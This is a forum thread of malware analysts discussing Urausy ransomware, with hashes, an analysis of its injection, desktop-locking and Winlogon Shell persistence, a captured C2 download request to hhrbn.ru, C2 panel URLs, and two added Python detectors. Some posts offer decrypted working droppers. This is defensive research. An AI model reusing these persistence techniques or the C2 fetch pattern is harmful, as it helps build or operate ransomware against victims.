Win32/Urausy (aka "WinLocker")

Win32/Urausy (aka "WinLocker")

Postby Win32:Virut » Fri Aug 17, 2012 10:27 am

Urausy

https://www.botnets.fr/index.php/Urausy

MD5: B88FD69B53A6E4587D9E95A0C6061141
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

Re: Trojan Ransom / FakePoliceAlert

Postby nullptr » Sun Sep 02, 2012 12:44 pm

Urausy

MD5: 74203CB3EE8722B8DE95CC2236C06F3E
vt - https://www.virustotal.com/file/59abd45 ... /analysis/
nullptr
 
Posts: 210
Joined: Sun Mar 14, 2010 6:35 am
Reputation point: 100

Re: Trojan Ransom / FakePoliceAlert

Postby Win32:Virut » Sun Sep 16, 2012 12:09 pm

5x Urausy
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

TrojanDownloader:Win32/Urausy.A

Postby Win32:Virut » Thu Oct 11, 2012 4:21 pm

Hi,

I'm looking for MD5: 0efd95e4d3502e20b7120685050abae2

Thanks
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

Re: Malware Requests, part 2

Postby rkhunter » Sat Oct 13, 2012 10:32 am

Win32:Virut wrote:Hi,

I'm looking for MD5: 0efd95e4d3502e20b7120685050abae2

Thanks

SHA256: e19c8f1ea80d6cf9d3348a07c7428bbcdfc66ea5a192f63e22a8e29cfda5aaf0
SHA1: fae01f374d5dde3271306aca91f842f9f0b17d75
MD5: 0efd95e4d3502e20b7120685050abae2
File size: 44032 bytes
rkhunter
 
Posts: 1145
Joined: Mon Mar 15, 2010 12:51 pm
Location: Russian Federation
Reputation point: 147

Re: Trojan Ransom / FakePoliceAlert

Postby Win32:Virut » Sat Nov 17, 2012 3:44 pm

Urausy

[Image attached]
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82

Re: Trojan Ransom / FakePoliceAlert

Postby rinn » Sat Nov 17, 2012 6:09 pm

Hi.

This is an interesting ransom. It is written in FASM 1.7 and this makes it something special. Usually ransomware are Delphi applications written by people with no programming skills. This one is different. It is still simple compared to famous trojans, but there are some features which make it special.

It has a three-stage startup.

On the first stage it registers the window class "SetupFrameClass", creates a window called "Setup" and waits a few milliseconds. After the wnd_procedure (see @004012D0) assumes control, it calls specially prepared code (see @004013A0) responsible for the second stage and further trojan installation.

Second stage: memory injection into explorer.exe. After this code activates, it creates a new special desktop named wLockDesktop, starts a zombified copy of svchost.exe with the trojan code injected (again) and the initial process desktop value set to wLockDesktop. Then execution transfers to this zombified svchost.exe.


The third stage is responsible for setting the autorun registry key

HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\shell with value explorer.exe,%userprofile%\Application Data\msconfig.dat

<--- this is the ransom itself (the copy-file routine also takes place in this stage).

The ransom (code running inside svchost.exe) ensures that wLockDesktop is the current active desktop by periodically switching to it. This was made to defeat Sysinternals Desktops and similar tools.

Decrypted and working dropper attached. Password "infected" without quotes.

Best Regards,
-rin
rinn
 
Posts: 91
Joined: Thu Nov 15, 2012 6:14 am
Location: Japan
Reputation point: 67
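
The persistence rinn describes above (a comma-separated Winlogon Shell value that keeps explorer.exe but also launches msconfig.dat from the user profile) is easy to check for on an image or a live box. The following is an added example, not code from rinn or from the sample: it parses a registry export in regedit/`reg export` format and flags Shell values that do more than start explorer.exe. The .reg text is constructed for the example, the HKLM values are the normal defaults used as a negative control, and the "user-writable location" hints and severity labels are my own choices, not anything the post specifies.

```python
import re
from typing import Dict, List

# Constructed sample of a registry export (regedit / `reg export` format) from a host
# infected the way rinn describes. Hive and key names are the real Winlogon paths;
# the per-user Shell value mirrors the one in the post. The HKLM values are the
# normal defaults and serve as a negative control.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe"
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,"

[HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="explorer.exe,%userprofile%\\Application Data\\msconfig.dat"
'''

_KEY_RE = re.compile(r'^\[(.+)\]\s*$')
_VALUE_RE = re.compile(r'^"([^"]+)"="((?:[^"\\]|\\.)*)"\s*$')

# Substrings (lower-cased) that mark a user-writable location; a logon shell
# launched from one of these is the pattern Urausy uses for msconfig.dat.
# The list is an assumption of this example, not something the post defines.
USER_WRITABLE_HINTS = ('%userprofile%', '%appdata%', '%temp%', 'application data',
                       '\\appdata\\', '\\temp\\', 'documents and settings', '\\users\\')


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Parse the REG_SZ subset of .reg syntax: "[key]" headers followed by
    "name"="data" lines. .reg escapes backslashes and quotes with a backslash."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        m = _KEY_RE.match(line)
        if m:
            current = m.group(1)
            keys[current] = {}
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            name, raw = m.groups()
            keys[current][name] = raw.replace('\\\\', '\\').replace('\\"', '"')
    return keys


def audit_winlogon_shell(keys: Dict[str, Dict[str, str]]) -> List[dict]:
    """Flag Winlogon Shell values that do more than start explorer.exe."""
    findings = []
    for key, values in keys.items():
        if not key.lower().endswith('\\windows nt\\currentversion\\winlogon'):
            continue
        shell = values.get('Shell')
        if shell is None:
            continue
        hive = key.split('\\', 1)[0].upper()
        if hive == 'HKEY_CURRENT_USER':
            # The default Shell lives only under HKLM; a per-user copy overrides it
            # for that account and is unusual on its own.
            findings.append({'key': key, 'value': shell, 'entry': None, 'severity': 'medium',
                             'reasons': ['per-user Shell override present']})
        # Winlogon starts every comma-separated entry, so "explorer.exe,<payload>"
        # keeps the desktop usable while also launching the payload at logon.
        for entry in (e.strip() for e in shell.split(',')):
            if not entry or entry.lower() == 'explorer.exe':
                continue
            lowered = entry.lower()
            reasons = []
            if any(h in lowered for h in USER_WRITABLE_HINTS):
                reasons.append('launched from a user-writable location')
            if not lowered.endswith('.exe'):
                reasons.append('shell entry does not have an .exe extension')
            if not reasons:
                reasons.append('extra shell entry besides explorer.exe')
            severity = 'high' if len(reasons) > 1 else 'medium'
            findings.append({'key': key, 'value': shell, 'entry': entry,
                             'severity': severity, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in audit_winlogon_shell(parse_reg_export(SAMPLE_REG_EXPORT)):
        print(f"[{f['severity']}] {f['key']}\\Shell = {f['value']}: {'; '.join(f['reasons'])}")
```

On the constructed sample this reports two findings for the HKCU key (the per-user override, and the msconfig.dat entry as high severity) and nothing for HKLM. Feed it the output of `reg export "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" out.reg` from a suspect profile, or a hive parsed offline, to run the same check on real data.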

Re: Trojan:Win32/Urausy (aka "WinLocker")

Postby EP_X0FF » Sun Nov 18, 2012 7:00 am

Switching to the different desktop is set in an infinite loop with a very small delay.

Code:
00000039   273.98556519   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000040   274.08596802   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000041   274.18600464   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000042   274.28622437   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000043   274.38613892   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000044   274.48648071   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000045   274.59146118   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000046   274.68685913   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000047   274.78668213   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000048   274.90359497   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000049   275.01293945   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000050   275.10397339   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000051   275.20385742   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000052   275.32345581   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000053   275.43780518   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000054   275.52349854   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000055   275.62338257   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   
00000056   275.72372437   [532] pid: 532 tid: 1008 Attempt to switch current desktop, target wLockDesktop - request denied   


WinLock window hierarchy (different run, that's why the PID differs).

[Image: WinLock window hierarchy]

An embedded IE window is used to display HTML-based content.

The payload is requested in an encrypted container, with a special marker prepended to the request string: "55565755".

GET /555657550B8836F821F3BF69B40E8541B9BB830D10E570A1C1B HTTP/1.1
User-Agent: Our_Agent
Host: hhrbn.ru
Cache-Control: no-cache

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Sun, 18 Nov 2012 01:11:11 GMT
Content-Type: application/octet-stream
Connection: keep-alive
X-Powered-By: PHP/5.3.3-7+squeeze14
Cache-Control: public
Content-Disposition: attachment; filename=32721
Content-Transfer-Encoding: binary
Content-Length: 83722


Decrypted into the %temp% folder and then executed by the ransom from the embedded full-screen IE window. Ransom page + all graphics/CSS attached.
Ring0 - the source of inspiration
EP_X0FF
Global Moderator
 
Posts: 4752
Joined: Sun Mar 07, 2010 5:35 am
Location: Russian Federation
Reputation point: 562
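
The payload fetch EP_X0FF captured above has three things a proxy or IDS analyst can key on: the request path is the marker 55565755 followed by a hex blob, the User-Agent is the hard-coded string Our_Agent, and the server answers with an application/octet-stream attachment whose filename is just digits. The following is an added example, not code from EP_X0FF: it parses raw HTTP request/response heads and scores an exchange on those three indicators. The captured exchange is the one quoted in the post; the benign request/response pair, the "non-browser User-Agent" heuristic and the alert threshold are my own constructions. The hex blob is kept as text rather than decoded, because the post says only that it is an "encrypted container" and does not describe its encoding.

```python
import re
from typing import Dict, List, Tuple

MARKER = "55565755"       # prefix EP_X0FF saw at the start of the request string
URAUSY_UA = "Our_Agent"   # User-Agent in the captured request

# Exchange quoted in the post, reassembled as raw HTTP heads.
CAPTURED_REQUEST = (
    "GET /555657550B8836F821F3BF69B40E8541B9BB830D10E570A1C1B HTTP/1.1\r\n"
    "User-Agent: Our_Agent\r\n"
    "Host: hhrbn.ru\r\n"
    "Cache-Control: no-cache\r\n"
    "\r\n"
)
CAPTURED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: nginx/0.7.67\r\n"
    "Date: Sun, 18 Nov 2012 01:11:11 GMT\r\n"
    "Content-Type: application/octet-stream\r\n"
    "Connection: keep-alive\r\n"
    "X-Powered-By: PHP/5.3.3-7+squeeze14\r\n"
    "Cache-Control: public\r\n"
    "Content-Disposition: attachment; filename=32721\r\n"
    "Content-Transfer-Encoding: binary\r\n"
    "Content-Length: 83722\r\n"
    "\r\n"
)
# Constructed benign pair used as a negative control (not from the post).
BENIGN_REQUEST = (
    "GET /images/logo.png HTTP/1.1\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 5.1) Firefox/16.0\r\n"
    "Host: www.example.com\r\n"
    "\r\n"
)
BENIGN_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Content-Type: image/png\r\n"
    "Content-Length: 1024\r\n"
    "\r\n"
)


def parse_http_head(raw: str) -> Tuple[str, Dict[str, str]]:
    """Split an HTTP head (request or response) into its start line and a
    lower-cased header map; parsing stops at the first blank line."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def split_marked_path(path: str):
    """Return the hex blob that follows the marker, or None when the path is
    not of the form /<MARKER><hex>. The blob is returned as text, not decoded."""
    if not path.startswith("/" + MARKER):
        return None
    blob = path[len(MARKER) + 1:]
    if len(blob) < 16 or not re.fullmatch(r"[0-9A-Fa-f]+", blob):
        return None
    return blob


def analyze_exchange(request: str, response: str = "") -> List[str]:
    """Return the list of indicators matched by one request/response pair."""
    indicators: List[str] = []
    start, req_h = parse_http_head(request)
    parts = start.split()
    path = parts[1] if len(parts) >= 2 else ""
    if split_marked_path(path) is not None:
        indicators.append("request path is marker %s followed by a hex blob" % MARKER)
    ua = req_h.get("user-agent", "")
    if ua == URAUSY_UA:
        indicators.append("User-Agent is the hard-coded string Our_Agent")
    elif not ua.startswith("Mozilla/"):
        # Heuristic of this example: anything that is not browser-like is worth a look.
        indicators.append("non-browser User-Agent")
    if response:
        _, resp_h = parse_http_head(response)
        disp = resp_h.get("content-disposition", "")
        m = re.search(r'filename="?(\d+)"?', disp)
        if resp_h.get("content-type", "").startswith("application/octet-stream") and m:
            indicators.append("octet-stream download with numeric filename %s" % m.group(1))
    return indicators


def scan(exchanges, threshold: int = 2) -> List[dict]:
    """Alert on every exchange that matches at least `threshold` indicators."""
    alerts = []
    for req, resp in exchanges:
        ind = analyze_exchange(req, resp)
        if len(ind) >= threshold:
            _, h = parse_http_head(req)
            alerts.append({"host": h.get("host", "?"), "indicators": ind})
    return alerts


if __name__ == "__main__":
    for a in scan([(CAPTURED_REQUEST, CAPTURED_RESPONSE), (BENIGN_REQUEST, BENIGN_RESPONSE)]):
        print(a["host"], "->", "; ".join(a["indicators"]))
```

The captured exchange matches all three indicators and the benign one matches none. Requiring two indicators rather than one keeps the rule from firing on every non-browser client that happens to download an octet-stream, while still catching a variant that changes only the User-Agent or only the marker.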

Re: Trojan:Win32/Urausy (aka "WinLocker")

Postby Xylitol » Sun Nov 18, 2012 10:43 am

EP_X0FF wrote:Host: hhrbn.ru

Not at home this weekend so I can't attack/disassemble stuff, but found this
Code:
rnmbe.su/hhrbn.ru
hxxp://46.37.162.28:80/user/login/ « auth service »
hxxp://hhrbn.ru:80/data.php
hxxp://hhrbn.ru:80/config.php
hxxp://hhrbn.ru:80/gateway.php
hxxp://hhrbn.ru:80/includes/rc4.php
hxxp://hhrbn.ru:80/includes/mysql.php
hxxp://hhrbn.ru:80/includes/functions.php
hxxp://hhrbn.ru:80/config/
hxxp://hhrbn.ru:80/cache/

mysql.php returns "could not find driver"; the rest are standard HTTP 200/Length 0, probably need parameters.
Xylitol
Global Moderator
 
Posts: 1634
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Reputation point: 491

Re: Trojan:Win32/Urausy (aka "WinLocker")

Postby Win32:Virut » Sun Nov 18, 2012 11:59 am

New Urausy
Win32:Virut
 
Posts: 324
Joined: Sat Jun 02, 2012 2:22 pm
Reputation point: 82
